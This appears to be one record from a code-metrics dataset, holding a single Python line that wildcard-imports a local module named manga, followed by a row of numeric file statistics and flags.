from .manga import * | 20 | 20 | 0.725 | 6 | 40 | 4.833333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.175 | 40 | 2 | 20 | 20 | 0.878788 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |